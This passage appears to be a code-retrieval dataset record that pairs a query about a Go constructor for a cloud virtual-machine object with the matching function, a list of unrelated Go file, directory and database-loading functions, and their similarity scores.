tick.Stop()\n\tgo func() {\n\t\tfor range tick.C {\n\t\t\tdiff := time.Since(t).Seconds()\n\t\t\tbytes := float64(atomic.LoadUint64(&bytes) / 1024 / 1024)\n\t\t\trates := bytes / diff\n\t\t\tklog.Info(\"restoring.allbytes[%vMB].time[%.2fsec].rates[%.2fMB/sec]...\", bytes, diff, rates)\n\t\t}\n\t}()\n\n\twg.Wait()\n\telapsed := time.Since(t).Seconds()\n\tklog.Info(\"restoring.all.done.cost[%.2fsec].allbytes[%.2fMB].rate[%.2fMB/s]\", elapsed, float64(bytes/1024/1024), (float64(bytes/1024/1024) / elapsed))\n}", "func MysqlLoad(file, dbname string) {\n\tdb, err := sql.Open(\"mysql\", dsn)\n\tif err != nil {\n\t\tfmt.Errorf(\"Fail to connect database. %s\", err.Error())\n\t}\n\tdefer db.Close()\n\tdb.Ping()\n\n\t_, err = db.Exec(\"USE \" + dbname)\n\tif err != nil {\n\t\tfmt.Printf(\"[db.EXEC] switch databases %s -> %s : \\n\", dbname, err.Error())\n\t\treturn\n\t}\n\n\tcontent, err := ioutil.ReadFile(file)\n\tif err != nil {\n\t\tfmt.Errorf(\"readfile error\")\n\t}\n\n\tdefer func() {\n\t\tif err := recover(); err != nil {\n\t\t\tfmt.Println(\"[EXEC RECOVER] error \", err)\n\t\t}\n\t}()\n\n\tqueries := strings.Split(string(content), \";\")\n\t// fmt.Println(queries)\n\tfor _, query := range queries {\n\t\tif strings.TrimSpace(query) != \"\" {\n\n\t\t\t// fmt.Println(query)\n\t\t\t_, err := db.Exec(query)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Errorf(\"[db.EXEC] %s -> %s : \", query, err.Error())\n\t\t\t}\n\t\t\t// a, _ := res.RowsAffected()\n\t\t\t// fmt.Println(a)\n\t\t}\n\t}\n\tfmt.Println(\"import \", file, \" finish !\")\n}", "func (d *directory) load() error {\n\tif len(d.data) > 0 {\n\t\treturn nil\n\t}\n\t// List of keys that should be pruned when running the merged data\n\t// through the spruce evaluator\n\t// * _public_key: only present in encrypted ejson files to identify the correct private key\n\t// not required in resulting document\n\tpruneKeys := []string{\"_public_key\"}\n\n\tvar err error\n\t// get the list of files that should be merged\n\terr = d.createOrderedDataFileList()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlog.WithFields(log.Fields{\n\t\t\"files\": strings.Join(d.orderedFileList[:], \" \"),\n\t}).Debug(\"Ordered list of files to merge\")\n\n\t// merge everything while decrypting any ejson files encountered\n\tfor _, path := range d.orderedFileList {\n\t\tfile, err := NewFile(path, true, d.ejson)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdoc := file.Map()\n\t\terr = mergo.Merge(&d.data, doc, mergo.WithOverride)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\terr = spruce.Eval(&d.data, d.skipEval, pruneKeys)\n\treturn err\n}", "func layoutFiles() []string {\n\tfiles, err := filepath.Glob(layoutDir + \"*\" + templateExt)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn files\n}", "func Files(internalDir string) (files []File, err error) {\n\tofficialTestSuiteDir := filepath.Join(internalDir, \"jsonschematestsuite\", \"testdata\", \"official\")\n\tif _, err := os.Stat(filepath.Join(officialTestSuiteDir, \"tests\")); os.IsNotExist(err) {\n\t\treturn nil, fmt.Errorf(\"missing git submodule, run \\\"git submodule init && git submodule update\\\": %w\", err)\n\t}\n\tfor _, root := range []string{\n\t\tfilepath.Join(internalDir, \"jsonschematestsuite\", \"testdata\"),\n\t\tfilepath.Join(officialTestSuiteDir, \"tests\", \"draft7\"),\n\t} {\n\t\terr = filepath.Walk(root, func(path string, info os.FileInfo, err error) error {\n\t\t\tif path == officialTestSuiteDir {\n\t\t\t\treturn filepath.SkipDir\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif !info.Mode().IsRegular() || filepath.Ext(info.Name()) != \".json\" {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tfiles = append(files, File{\n\t\t\t\tName: strings.TrimSuffix(strings.TrimPrefix(path, root+string(os.PathSeparator)), \".json\"),\n\t\t\t\tpath: path,\n\t\t\t})\n\t\t\treturn nil\n\t\t})\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn files, err\n}", "func (fs FS) Migrations() []string {\n\tresult := []string{}\n\tfor filename, contents := range fs {\n\t\t// skip empty files (minimum valid statement is `--`, a comment)\n\t\tif len(contents) < 2 {\n\t\t\tcontinue\n\t\t}\n\t\tif matched, _ := filepath.Match(\"*.up.sql\", filename); matched {\n\t\t\tresult = append(result, filename)\n\t\t}\n\t}\n\tsort.Strings(result)\n\treturn result\n}", "func (d *PartialDriver) Init(fsys fs.FS, path string) error {\n\tentries, err := fs.ReadDir(fsys, path)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tms := source.NewMigrations()\n\tfor _, e := range entries {\n\t\tif e.IsDir() {\n\t\t\tcontinue\n\t\t}\n\t\tm, err := source.DefaultParse(e.Name())\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\tfile, err := e.Info()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !ms.Append(m) {\n\t\t\treturn source.ErrDuplicateMigration{\n\t\t\t\tMigration: *m,\n\t\t\t\tFileInfo: file,\n\t\t\t}\n\t\t}\n\t}\n\n\td.fsys = fsys\n\td.path = path\n\td.migrations = ms\n\treturn nil\n}", "func (fs *Mysqlfs) ReadDir(path string) ([]os.FileInfo, error) {\n\tf, err := fs.storage.GetFile(path)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif f != nil {\n\t\tif target, isLink := fs.resolveLink(path, f); isLink {\n\t\t\treturn fs.ReadDir(target)\n\t\t}\n\t}\n\n\tvar entries []os.FileInfo\n\tchildren, err := fs.storage.Children(path)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, f := range children {\n\t\tfi, _ := f.Stat()\n\t\tentries = append(entries, fi)\n\t}\n\n\treturn entries, nil\n}", "func grabFilesInDir(dirPath string) []string {\n\tvar files []string\n\n\terr := filepath.Walk(dirPath, func(path string, info os.FileInfo, err error) error {\n\t\tif err == nil && isMIDIFile(info.Name()) {\n\t\t\tfilePath := filepath.Clean(path)\n\t\t\tfiles = append(files, filePath)\n\t\t}\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to walk through dirPath %v with error: %v\", dirPath, err)\n\t}\n\treturn files\n}", "func walkFiles(dir string) ([]Page, string) {\n\tfiles, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, fmt.Sprintf(\"Failed to read pages dir (%s)\", err)\n\t}\n\tpgs := []Page{}\n\tfor _, f := range files {\n\t\tif f.IsDir() {\n\t\t\tpgs2, errMsg := walkFiles(dir + \"/\" + f.Name())\n\t\t\tif errMsg != \"\" {\n\t\t\t\treturn nil, errMsg\n\t\t\t}\n\t\t\tpgs = append(pgs, pgs2...)\n\t\t} else {\n\t\t\tpgs = append(pgs, buildPage(dir, f.Name()))\n\t\t}\n\t}\n\treturn pgs, \"\"\n}", "func (db *FileDB) ToSlice() []File {\n\t// generate slice from Published map\n\tpublishedToSlice := func(m FileMapDB, mapName string) interface{} {\n\t\tfiles := make([]File, 0, len(m))\n\n\t\tfor _, file := range m {\n\t\t\tif file.State != Deleted {\n\t\t\t\tfiles = append(files, file)\n\t\t\t}\n\t\t}\n\n\t\treturn files\n\t}\n\n\treturn db.Published.PerformFunc(publishedToSlice).([]File)\n}", "func (db *DB) PrepareQueries(filePath, bucketName string) error {\n\n\tn1qlFiles, err := walk(filePath)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, f := range n1qlFiles {\n\t\tc, err := ioutil.ReadFile(f)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// substitute the bucket name.\n\t\tquery := string(c)\n\t\tquery = strings.ReplaceAll(query, \"bucket_name\", bucketName)\n\n\t\tname := filepath.Base(f)\n\t\tswitch name {\n\t\tcase \"user-activities.n1ql\":\n\t\t\tdb.N1QLQuery.UserActivities = query\n\t\tcase \"ano-user-activities.n1ql\":\n\t\t\tdb.N1QLQuery.AnoUserActivities = query\n\t\t}\n\t}\n\n\treturn nil\n}", "func loadShaderFilesFromDirectory(dir string) ([]string, []ShaderType, error) {\n\tvar (\n\t\tshaders []string\n\t\tshaderTypes []ShaderType\n\t)\n\tif err := filepath.Walk(dir, func(path string, f os.FileInfo, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif strings.HasSuffix(f.Name(), shaderSuffix) {\n\t\t\tshader := strings.TrimSuffix(f.Name(), shaderSuffix)\n\t\t\tnodes := strings.Split(shader, \".\")\n\n\t\t\tif len(nodes) != 2 {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tsuffix := nodes[len(nodes)-1]\n\t\t\tswitch suffix {\n\t\t\tcase \"frag\":\n\t\t\t\tshaderTypes = append(shaderTypes, FragmentShaderType)\n\t\t\t\tshaders = append(shaders, path)\n\t\t\tcase \"vert\":\n\t\t\t\tshaderTypes = append(shaderTypes, VertexShaderType)\n\t\t\t\tshaders = append(shaders, path)\n\t\t\tdefault:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}); err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn shaders, shaderTypes, nil\n}", "func (s *IntegrationSuite) reparseScratchDir(t *testing.T) {\n\tt.Helper()\n\tdir, err := getDir(s.scratchPath())\n\tif err != nil {\n\t\tt.Fatalf(\"Unexpected error from getDir: %v\", err)\n\t} else if len(dir.LogicalSchemas) != 1 {\n\t\tt.Fatalf(\"Unexpected logical schema count for %s: %d\", dir, len(dir.LogicalSchemas))\n\t}\n\tif s.d.Flavor().OmitIntDisplayWidth() || s.d.Flavor().AlwaysShowCollate() {\n\t\tfor _, sqlFile := range dir.SQLFiles {\n\t\t\tcontents, err := os.ReadFile(sqlFile.FilePath)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"Unexpected error from ReadFile: %v\", err)\n\t\t\t}\n\t\t\tvar newContents string\n\t\t\tif s.d.Flavor().OmitIntDisplayWidth() {\n\t\t\t\tnewContents = stripDisplayWidth(string(contents))\n\t\t\t}\n\t\t\tif s.d.Flavor().AlwaysShowCollate() {\n\t\t\t\tnewContents = strings.ReplaceAll(string(contents), \"DEFAULT CHARSET=latin1;\", \"DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;\")\n\t\t\t\tnewContents = strings.ReplaceAll(newContents, \"DEFAULT CHARSET=latin1\\n\", \"DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci\\n\")\n\t\t\t}\n\t\t\tif newContents != string(contents) {\n\t\t\t\terr := os.WriteFile(sqlFile.FilePath, []byte(newContents), 0777)\n\t\t\t\tif err != nil {\n\t\t\t\t\tt.Fatalf(\"Unexpected error from WriteFile: %v\", err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif dir, err = getDir(s.scratchPath()); err != nil {\n\t\t\tt.Fatalf(\"Unexpected error from getDir: %v\", err)\n\t\t}\n\t}\n\ts.scratchDir = dir\n}", "func (r *Atomustache) loadLayouts() error {\n\n\tfiles, err := ioutil.ReadDir(r.LayoutsFolder)\n\tif err != nil {\n\t\treturn errors.New(\"Error reading layouts folder: \" + err.Error())\n\t}\n\n\tfor _, file := range files {\n\t\tif strings.HasSuffix(file.Name(), r.Ext) {\n\n\t\t\tk := noExt(file.Name())\n\t\t\tpath := r.LayoutsFolder + \"/\" + file.Name()\n\n\t\t\tv, fErr := ioutil.ReadFile(path)\n\t\t\tif fErr != nil {\n\t\t\t\treturn errors.New(\"Error reading file (\" + path + \"): \" + fErr.Error())\n\t\t\t}\n\n\t\t\tt, mErr := ParseString(string(v), nil)\n\t\t\tif mErr != nil {\n\t\t\t\treturn errors.New(\"Error parsing string for file (\" + path + \"): \" + mErr.Error())\n\t\t\t}\n\n\t\t\tr.Layouts[k] = t\n\t\t}\n\t}\n\n\treturn nil\n}", "func (dr *dependencyResolver) readDir(\n\trelPath string) (entries []os.FileInfo, err error) {\n\t// Note that ioutil.ReadDir guarantees that the output is sorted by name.\n\tentries, err = ioutil.ReadDir(path.Join(dr.basePath, relPath))\n\treturn\n}", "func processDir(p plugin.Interface, pluginDir, dir string, processor postProcessor, shouldProcessFile fileSelector) ([]Item, error) {\n\tresults := []Item{}\n\n\terr := filepath.Walk(dir, func(curPath string, info os.FileInfo, err error) error {\n\t\tif shouldProcessFile(curPath, info) {\n\t\t\tnewItem, err := processor(pluginDir, curPath)\n\t\t\tif err != nil {\n\t\t\t\tlogrus.Errorf(\"Error processing file %v: %v\", curPath, err)\n\t\t\t}\n\t\t\tresults = append(results, newItem)\n\t\t}\n\t\treturn nil\n\t})\n\treturn results, err\n}", "func Scan(folder, pattern string) ([]string, error) {\n\tfiles, err := os.ReadDir(folder)\n\tif err != nil {\n\t\treturn []string{}, err\n\t}\n\n\tplugins := []string{}\n\tfor _, file := range files {\n\t\tif !file.IsDir() && strings.Contains(file.Name(), pattern) {\n\t\t\tplugins = append(plugins, filepath.Join(folder, file.Name()))\n\t\t}\n\t}\n\n\treturn plugins, nil\n}", "func PopulateFolder(dir, ext string, files ...string) []string {\n\tfullpaths := make([]string, len(files))\n\tfor i, name := range files {\n\t\tfullpaths[i] = filepath.Join(dir, name) + ext\n\t}\n\treturn fullpaths\n}", "func readObjects(dir string) ([]string, error) {\n\n\tfiles, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar objects []string\n\tfor _, file := range files {\n\t\tif isObject(file) {\n\t\t\tpath := getPath(dir, file)\n\t\t\tobject, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tobjects = append(objects, string(object))\n\t\t}\n\t}\n\treturn objects, nil\n}", "func BatchLoad(baseFolder string) error {\n\treturn batchLoad(baseFolder, false)\n}", "func filesIn(dir string) []string {\n\tfh, err := os.Open(dir)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfiles, err := fh.Readdirnames(0)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn files\n}", "func (n *node) ReadDirAll(ctx context.Context) (ents []fuse.Dirent, err error) {\n\tn.te.ForeachChild(func(baseName string, ent *stargz.TOCEntry) bool {\n\t\tents = append(ents, fuse.Dirent{\n\t\t\tInode: inodeOfEnt(ent),\n\t\t\tType: direntType(ent),\n\t\t\tName: baseName,\n\t\t})\n\t\treturn true\n\t})\n\tsort.Slice(ents, func(i, j int) bool { return ents[i].Name < ents[j].Name })\n\treturn ents, nil\n}", "func getFileList(inputFolder string) []os.FileInfo {\r\n\tlist := make([]os.FileInfo, 0)\r\n\r\n\tfileList, err := ioutil.ReadDir(inputFolder)\r\n\tparseError(err)\r\n\r\n\tfor _, file := range fileList {\r\n\t\tif file.IsDir() == false {\r\n\t\t\tif filepath.Ext(file.Name()) == \".pu\" {\r\n\t\t\t\tlist = append(list, file)\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn list\r\n}", "func (s LocalFSStore) ReadDir(dirname string) ([]string, error) {\n\tif fs, err := ioutil.ReadDir(dirname); err != nil {\n\t\treturn nil, err\n\t} else {\n\t\tres := make([]string, len(fs))\n\t\tfor i := range fs {\n\t\t\tres[i] = fs[i].Name()\n\t\t}\n\t\treturn res, nil\n\t}\n}", "func (storage *B2Storage) ListFiles(threadIndex int, dir string) (files []string, sizes []int64, err error) {\n for len(dir) > 0 && dir[len(dir) - 1] == '/' {\n dir = dir[:len(dir) - 1]\n }\n length := len(dir) + 1\n\n includeVersions := false\n if dir == \"chunks\" {\n includeVersions = true\n }\n\n entries, err := storage.clients[threadIndex].ListFileNames(dir, false, includeVersions)\n if err != nil {\n return nil, nil, err\n }\n\n if dir == \"snapshots\" {\n\n subDirs := make(map[string]bool)\n\n for _, entry := range entries {\n name := entry.FileName[length:]\n subDir := strings.Split(name, \"/\")[0]\n subDirs[subDir + \"/\"] = true\n }\n\n for subDir, _ := range subDirs {\n files = append(files, subDir)\n }\n } else if dir == \"chunks\" {\n lastFile := \"\"\n for _, entry := range entries {\n if entry.FileName == lastFile {\n continue\n }\n lastFile = entry.FileName\n if entry.Action == \"hide\" {\n files = append(files, entry.FileName[length:] + \".fsl\")\n } else {\n files = append(files, entry.FileName[length:])\n }\n sizes = append(sizes, entry.Size)\n }\n } else {\n for _, entry := range entries {\n files = append(files, entry.FileName[length:])\n }\n }\n\n return files, sizes, nil\n}", "func LoadWorlds() ([]string, error) {\n\tpath := savesPath\n\tif _, err := os.Stat(path); os.IsNotExist(err) {\n\t\tif err := os.Mkdir(path, 0755); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\tfiles, err := ioutil.ReadDir(savesPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar names []string\n\tfor _, f := range files {\n\t\tnames = append(names, f.Name())\n\t}\n\treturn names, nil\n}", "func (repo Repository) GetByDir(dir string) (data [][]byte, err error) {\n\tfullPath := path.Join(repo.StorageDir, dir)\n\tfiles, err := ioutil.ReadDir(fullPath)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tfor _, file := range files {\n\t\tnewFile := []byte{}\n\t\tfilePath := path.Join(fullPath, file.Name())\n\t\tf, err := os.Open(filePath)\n\t\tif err != nil {\n\t\t\treturn data, err\n\t\t}\n\t\t_, err = f.Read(newFile)\n\t\tif err != nil {\n\t\t\treturn data, err\n\t\t}\n\n\t\tdata = append(data, newFile)\n\t}\n\n\treturn\n}", "func LoadDiskMigrations(config *config.Config, createLoader func(*config.Config) loader.Loader) []types.Migration {\n\tloader := createLoader(config)\n\tdiskMigrations := loader.GetMigrations()\n\tlog.Printf(\"Read [%d] disk migrations ==> OK\", len(diskMigrations))\n\treturn diskMigrations\n}", "func ImportPages(db *sql.DB, t *models.Title) {\n\td, err := os.Open(t.Path)\n\tbhlindex.Check(err)\n\tdefer func() {\n\t\terr := d.Close()\n\t\tbhlindex.Check(err)\n\t}()\n\n\tnames, err := d.Readdirnames(-1)\n\tbhlindex.Check(err)\n\tvar pageIDs []string\n\tfor _, name := range names {\n\t\tif models.IsPageFile(name) {\n\t\t\tid := models.PageID(name)\n\t\t\tpageIDs = append(pageIDs, id)\n\t\t}\n\t}\n\tpages := generatePages(pageIDs, t.ID)\n\tt.Content.Concatenate(pages, t.Path)\n\tsavePages(db, t)\n}", "func LoadStories(dir string) (storyMap map[int]story.Story, err error) {\n\tfiles, err := ioutil.ReadDir(dir)\n\tstoryMap = make(map[int]story.Story)\n\n\tif err != nil {\n\t\terr = errors.New(\"No\" + dir + \" folder found. Aborting\")\n\n\t\treturn\n\t}\n\n\tfor index, file := range files {\n\t\tif !file.IsDir() {\n\t\t\tif file.Name() == \".gitignore\" {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\tloadedStory, err := load(dir + \"/\" + file.Name())\n\n\t\t\tif err != nil {\n\t\t\t\treturn storyMap, err\n\t\t\t}\n\n\t\t\tloadedStory.StoryId = index\n\t\t\tstoryMap[index] = loadedStory\n\t\t}\n\t}\n\n\treturn\n}", "func (gn *Gen) LoadFileNamesFromDir(dn string, ext string) []string {\n\tnms := []string{}\n\tfiles, err := ioutil.ReadDir(dn)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfor _, f := range files {\n\t\tif len(ext) > 0 {\n\t\t\tif strings.HasSuffix(f.Name(), ext) == false {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tnms = append(nms, f.Name())\n\t}\n\treturn nms\n}", "func SourceFile(filenames ...string) SqlSource {\n\treturn func(tx *sql.Tx) ([]string, error) {\n\t\tvar retStmts []string\n\t\tfor _, filename := range filenames {\n\t\t\tf, err := os.Open(filename)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\t// parse source file\n\t\t\tstmts, err := ParseSQLStatements(f)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\tretStmts = append(retStmts, stmts...)\n\t\t}\n\t\treturn retStmts, nil\n\t}\n}" ]
[ "0.6593268", "0.65293294", "0.65081114", "0.58625174", "0.5853544", "0.5808226", "0.5521994", "0.53496814", "0.52938294", "0.5240569", "0.50890553", "0.50107247", "0.50084805", "0.5007661", "0.4976275", "0.4968281", "0.49641117", "0.49431375", "0.4933084", "0.4902429", "0.4896101", "0.48386896", "0.48328134", "0.4829825", "0.482588", "0.48258734", "0.48183262", "0.48135954", "0.48082474", "0.47833574", "0.47832263", "0.47670838", "0.47577408", "0.4743325", "0.4738269", "0.47367093", "0.4731941", "0.47311112", "0.47286946", "0.4727276", "0.4726137", "0.47220576", "0.47164273", "0.47138065", "0.4710974", "0.47056603", "0.4703242", "0.4702141", "0.47018108", "0.46979904", "0.4684115", "0.4682791", "0.4659539", "0.4653683", "0.46504185", "0.46500766", "0.46426356", "0.46422967", "0.46418533", "0.46410394", "0.46370113", "0.4636517", "0.46365094", "0.46354142", "0.46342626", "0.46331033", "0.4625688", "0.46201366", "0.46191645", "0.46182066", "0.46007782", "0.45999366", "0.4596459", "0.45960847", "0.4595884", "0.45813686", "0.4572973", "0.4572443", "0.45672303", "0.45671406", "0.45608", "0.45599303", "0.45545137", "0.45523262", "0.454802", "0.45453686", "0.45429218", "0.4539385", "0.45344254", "0.45307016", "0.4529837", "0.4518463", "0.45122522", "0.45088395", "0.4503269", "0.45000747", "0.44964647", "0.4490551", "0.44888607", "0.44778332" ]
0.6502143
3
NewCloudAwsVirtualMachineAllOf instantiates a new CloudAwsVirtualMachineAllOf object This constructor will assign default values to properties that have it defined, and makes sure properties required by API are set, but the set of arguments will change when the set of required properties is changed
func NewCloudAwsVirtualMachineAllOf(classId string, objectType string) *CloudAwsVirtualMachineAllOf { this := CloudAwsVirtualMachineAllOf{} this.ClassId = classId this.ObjectType = objectType return &this }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewCloudAwsVirtualMachineAllOfWithDefaults() *CloudAwsVirtualMachineAllOf {\n\tthis := CloudAwsVirtualMachineAllOf{}\n\tvar classId string = \"cloud.AwsVirtualMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"cloud.AwsVirtualMachine\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationVmwareVirtualMachineAllOfWithDefaults() *VirtualizationVmwareVirtualMachineAllOf {\n\tthis := VirtualizationVmwareVirtualMachineAllOf{}\n\tvar classId string = \"virtualization.VmwareVirtualMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"virtualization.VmwareVirtualMachine\"\n\tthis.ObjectType = objectType\n\tvar guestState string = \"Unknown\"\n\tthis.GuestState = &guestState\n\treturn &this\n}", "func NewCloudInstanceTypeAllOf(classId string, objectType string) *CloudInstanceTypeAllOf {\n\tthis := CloudInstanceTypeAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewHyperflexVirtualMachineAllOf(classId string, objectType string) *HyperflexVirtualMachineAllOf {\n\tthis := HyperflexVirtualMachineAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewHyperflexVirtualMachineAllOfWithDefaults() *HyperflexVirtualMachineAllOf {\n\tthis := HyperflexVirtualMachineAllOf{}\n\tvar classId string = \"hyperflex.VirtualMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"hyperflex.VirtualMachine\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationVmwareVirtualMachineAllOf(classId string, objectType string) *VirtualizationVmwareVirtualMachineAllOf {\n\tthis := VirtualizationVmwareVirtualMachineAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar guestState string = \"Unknown\"\n\tthis.GuestState = &guestState\n\treturn &this\n}", "func NewCloudInstanceTypeAllOfWithDefaults() *CloudInstanceTypeAllOf {\n\tthis := CloudInstanceTypeAllOf{}\n\tvar classId string = \"cloud.InstanceType\"\n\tthis.ClassId = classId\n\tvar objectType string = \"cloud.InstanceType\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamServiceProviderAllOf(classId string, objectType string) *IamServiceProviderAllOf {\n\tthis := IamServiceProviderAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamServiceProviderAllOfWithDefaults() *IamServiceProviderAllOf {\n\tthis := IamServiceProviderAllOf{}\n\tvar classId string = \"iam.ServiceProvider\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.ServiceProvider\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationIweClusterAllOfWithDefaults() *VirtualizationIweClusterAllOf {\n\tthis := VirtualizationIweClusterAllOf{}\n\tvar classId string = \"virtualization.IweCluster\"\n\tthis.ClassId = classId\n\tvar objectType string = \"virtualization.IweCluster\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationIweClusterAllOf(classId string, objectType string) *VirtualizationIweClusterAllOf {\n\tthis := VirtualizationIweClusterAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewComputeBladeIdentityAllOfWithDefaults() *ComputeBladeIdentityAllOf {\n\tthis := ComputeBladeIdentityAllOf{}\n\tvar classId string = \"compute.BladeIdentity\"\n\tthis.ClassId = classId\n\tvar objectType string = \"compute.BladeIdentity\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewMacpoolPoolMemberAllOfWithDefaults() *MacpoolPoolMemberAllOf {\n\tthis := MacpoolPoolMemberAllOf{}\n\tvar classId string = \"macpool.PoolMember\"\n\tthis.ClassId = classId\n\tvar objectType string = \"macpool.PoolMember\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func newVirtualMachineScaleSetVMsClient(subscriptionID string, baseURI string, authorizer autorest.Authorizer) compute.VirtualMachineScaleSetVMsClient {\n\tc := compute.NewVirtualMachineScaleSetVMsClientWithBaseURI(baseURI, subscriptionID)\n\tc.Authorizer = authorizer\n\tc.RetryAttempts = 1\n\t_ = c.AddToUserAgent(azure.UserAgent()) // intentionally ignore error as it doesn't matter\n\treturn c\n}", "func NewInventoryBaseAllOf(classId string, objectType string) *InventoryBaseAllOf {\n\tthis := InventoryBaseAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationBaseHostPciDeviceAllOfWithDefaults() *VirtualizationBaseHostPciDeviceAllOf {\n\tthis := VirtualizationBaseHostPciDeviceAllOf{}\n\tvar classId string = \"virtualization.VmwareHostGpu\"\n\tthis.ClassId = classId\n\tvar objectType string = \"virtualization.VmwareHostGpu\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewInventoryBaseAllOfWithDefaults() *InventoryBaseAllOf {\n\tthis := InventoryBaseAllOf{}\n\treturn &this\n}", "func NewHyperflexVmSnapshotInfoAllOfWithDefaults() *HyperflexVmSnapshotInfoAllOf {\n\tthis := HyperflexVmSnapshotInfoAllOf{}\n\tvar classId string = \"hyperflex.VmSnapshotInfo\"\n\tthis.ClassId = classId\n\tvar objectType string = \"hyperflex.VmSnapshotInfo\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewNiatelemetryEqptcapacityPolUsage5minAllOfWithDefaults() *NiatelemetryEqptcapacityPolUsage5minAllOf {\n\tthis := NiatelemetryEqptcapacityPolUsage5minAllOf{}\n\tvar classId string = \"niatelemetry.EqptcapacityPolUsage5min\"\n\tthis.ClassId = classId\n\tvar objectType string = \"niatelemetry.EqptcapacityPolUsage5min\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewInfraBasePciConfigurationAllOf(classId string, objectType string) *InfraBasePciConfigurationAllOf {\n\tthis := InfraBasePciConfigurationAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageVdMemberEpAllOf(classId string, objectType string) *StorageVdMemberEpAllOf {\n\tthis := StorageVdMemberEpAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewMacpoolLeaseAllOfWithDefaults() *MacpoolLeaseAllOf {\n\tthis := MacpoolLeaseAllOf{}\n\tvar classId string = \"macpool.Lease\"\n\tthis.ClassId = classId\n\tvar objectType string = \"macpool.Lease\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewMacpoolPoolMemberAllOf(classId string, objectType string) *MacpoolPoolMemberAllOf {\n\tthis := MacpoolPoolMemberAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewMacpoolLeaseAllOf(classId string, objectType string) *MacpoolLeaseAllOf {\n\tthis := MacpoolLeaseAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageVdMemberEpAllOfWithDefaults() *StorageVdMemberEpAllOf {\n\tthis := StorageVdMemberEpAllOf{}\n\tvar classId string = \"storage.VdMemberEp\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.VdMemberEp\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamLdapBasePropertiesAllOf(classId string, objectType string) *IamLdapBasePropertiesAllOf {\n\tthis := IamLdapBasePropertiesAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar bindMethod 